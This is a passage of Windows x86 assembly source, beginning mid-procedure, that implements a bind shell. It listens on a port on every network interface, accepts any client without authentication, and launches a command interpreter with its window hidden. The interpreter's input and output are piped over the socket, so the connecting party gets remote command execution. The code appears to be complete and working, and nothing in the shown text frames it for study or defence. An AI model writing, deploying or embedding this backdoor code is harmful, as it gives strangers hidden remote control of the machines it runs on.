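        mov     [startupinfo.hStdInput],eax
        mov     [startupinfo.dwFlags],STARTF_USESHOWWINDOW + STARTF_USESTDHANDLES
        mov     [startupinfo.wShowWindow],SW_HIDE
        invoke  CreateProcessA,0,szCommandLine,0,0,TRUE,CREATE_NEW_CONSOLE,0,0,addr startupinfo,addr processinfo
        .if eax = 0
                ; no child: release everything we hold and hang up on the client
                invoke  CloseHandle,[hoWrite]
                invoke  CloseHandle,[hiRead]
                invoke  CloseHandle,[hiWrite]
                invoke  CloseHandle,[hoRead]
                invoke  closesocket,[client]
                xor     eax,eax
                ret
        .endif
        ; the child owns its two ends now; drop ours so EOF can propagate
        invoke  CloseHandle,[hoWrite]
        invoke  CloseHandle,[hiRead]

        ; non-blocking recv lets this one thread poll both directions
        mov     [nonblock],1
        invoke  ioctlsocket,[client],FIONBIO,addr nonblock
        invoke  lstrlenA,szBanner
        invoke  send,[client],szBanner,eax,0

        mov     [exitcode],STILL_ACTIVE          ; in case GetExitCodeProcess fails
        .while TRUE
                invoke  Sleep,1

                ; stdout -> socket: forward everything the child wrote so far
    .drain:
                invoke  PeekNamedPipe,[hoRead],0,0,0,addr available,0
                test    eax,eax
                jz      .drained                 ; pipe broken: child is gone
                cmp     [available],0
                je      .drained
                invoke  ReadFile,[hoRead],addr buffer,BUFFER_SIZE,addr bytes,0
                test    eax,eax
                jz      .drained
                cmp     [bytes],0
                je      .drained
                invoke  send,[client],addr buffer,[bytes],0
                jmp     .drain
    .drained:

                ; child ended on its own (client typed "exit"): session over
                invoke  GetExitCodeProcess,[processinfo.hProcess],addr exitcode
                .if [exitcode] <> STILL_ACTIVE
                        .break
                .endif

                ; socket -> stdin
                invoke  recv,[client],addr buffer,BUFFER_SIZE,0
                .if eax = 0
                        ; orderly close by the peer. recv sets no Winsock error
                        ; for this, so it must be recognised before
                        ; WSAGetLastError is consulted - otherwise the stale
                        ; WSAEWOULDBLOCK of the previous poll would keep the
                        ; loop, and cmd.exe, alive after the client is gone.
                        invoke  TerminateProcess,[processinfo.hProcess],0
                        .break
                .elseif eax = SOCKET_ERROR
                        invoke  WSAGetLastError
                        .if eax <> WSAEWOULDBLOCK
                                ; reset or any other failure: kill the child
                                invoke  TerminateProcess,[processinfo.hProcess],0
                                .break
                        .endif
                .else
                        mov     ecx,eax                  ; invoke's 'addr' may clobber edx; keep the count in ecx
                        invoke  WriteFile,[hiWrite],addr buffer,ecx,addr bytes,0
                .endif
        .endw

        invoke  CloseHandle,[processinfo.hThread]
        invoke  CloseHandle,[processinfo.hProcess]
        invoke  CloseHandle,[hiWrite]
        invoke  CloseHandle,[hoRead]
        invoke  closesocket,[client]
        xor     eax,eax
        ret
endp

; Creates the listening socket, binds it to port mysocket on every
; interface and hands each accepted client to a BindCmd thread. Returns
; only if the socket cannot be created, bound or put into listen state.
proc Shell
  locals
        hsocket dd ?
        iMode   dd ?
  endl
        invoke  WSAStartup,0202h,wsadata
        invoke  socket,AF_INET,SOCK_STREAM,0
        cmp     eax,INVALID_SOCKET
        je      .done
        mov     [hsocket],eax
        mov     [sock.sin_family],AF_INET
        mov     [sock.sin_addr],0                ; INADDR_ANY
        mov     ax,[mysocket]
        xchg    ah,al                            ; host -> network byte order
        mov     [sock.sin_port],ax
        invoke  bind,[hsocket],sock,sizeof.sockaddr_in
        test    eax,eax
        jnz     .fail                            ; e.g. port already in use
        ; non-blocking listening socket: accept returns INVALID_SOCKET
        ; instead of blocking, and the loop below polls once a second
        mov     [iMode],1
        invoke  ioctlsocket,[hsocket],FIONBIO,addr iMode
        invoke  listen,[hsocket],SOMAXCONN
        test    eax,eax
        jnz     .fail
  .accept:
        invoke  accept,[hsocket],0,0             ; peer address is not needed
        cmp     eax,INVALID_SOCKET
        je      .wait
        invoke  CreateThread,0,0,BindCmd,eax,0,0
        invoke  CloseHandle,eax                  ; thread handle only; the thread keeps running
  .wait:
        invoke  Sleep,1000
        jmp     .accept
  .fail:
        invoke  closesocket,[hsocket]
  .done:
        ret
endp

section '.idata' import data readable

library kernel,'KERNEL32.DLL',\
        Ws2_32,'Ws2_32.dll'

import  kernel,\
        ExitProcess,'ExitProcess',\
        lstrlenA,'lstrlenA',\
        CreateThread,'CreateThread',\
        CloseHandle,'CloseHandle',\
        Sleep,'Sleep',\
        CreatePipe,'CreatePipe',\
        SetHandleInformation,'SetHandleInformation',\
        GetStartupInfoA,'GetStartupInfoA',\
        CreateProcessA,'CreateProcessA',\
        GetExitCodeProcess,'GetExitCodeProcess',\
        PeekNamedPipe,'PeekNamedPipe',\
        ReadFile,'ReadFile',\
        TerminateProcess,'TerminateProcess',\
        WriteFile,'WriteFile'

import  Ws2_32,\
        WSAStartup,'WSAStartup',\
        socket,'socket',\
        WSACleanup,'WSACleanup',\
        bind,'bind',\
        listen,'listen',\
        accept,'accept',\
        ioctlsocket,'ioctlsocket',\
        send,'send',\
        recv,'recv',\
        WSAGetLastError,'WSAGetLastError',\
        closesocket,'closesocket'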